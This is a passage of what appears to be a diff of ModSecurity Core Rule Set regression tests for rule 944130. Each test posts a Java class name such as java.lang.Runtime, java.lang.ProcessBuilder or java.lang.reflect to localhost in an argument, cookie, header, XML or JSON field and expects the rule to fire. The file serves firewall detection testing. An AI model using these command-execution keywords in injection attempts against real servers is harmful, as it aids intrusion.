Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-329 + desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-330 + desc: "Argument test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-331 + desc: "Argument name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-332 + desc: "Cookie test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-333 + desc: "Cookie name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-334 + desc: "Request header test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
test: java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-335 + desc: "XML attribute value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-336 + desc: "XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-337 + desc: "Nested XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-338 + desc: "Content-Type text/plain 
includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-339 + desc: "Content-Type application/json arg value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-340 + desc: "Content-Type application/json arg name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-341 + desc: "Argument test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-342 + desc: "Argument name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-343 + desc: "Cookie test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-344 + desc: "Cookie name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-345 + desc: "Request header test includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-346 + desc: "XML attribute value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-347 + desc: "XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-348 + desc: "Nested XML element value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-349 + desc: "Content-Type text/plain includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_title: 944130-350 + desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + 
method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-351 + desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-352 + desc: "Argument test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-353 + desc: "Argument name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log_contains: "id 
\"944130\"" + - test_title: 944130-354 + desc: "Cookie test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-355 + desc: "Cookie name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-356 + desc: "Request header test includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-357 + desc: "XML attribute value includes 
keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-358 + desc: "XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-359 + desc: "Nested XML element value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-360 + desc: "Content-Type text/plain includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_title: 944130-361 + desc: "Content-Type application/json arg value includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-362 + desc: "Content-Type application/json arg name includes keyword java.lang.String" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-363 + desc: "Argument test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-364 + desc: "Argument name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-365 + desc: "Cookie test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-366 + desc: "Cookie name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-367 + desc: "Request header test includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-368 + desc: "XML attribute value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-369 + desc: "XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-370 + desc: "Nested XML element value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-371 + desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-372 + desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + 
log_contains: "id \"944130\"" + - test_title: 944130-373 + desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-374 + desc: "Argument test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-375 + desc: "Argument name includes keyword java.lang.System" + stages: + - stage: + input: 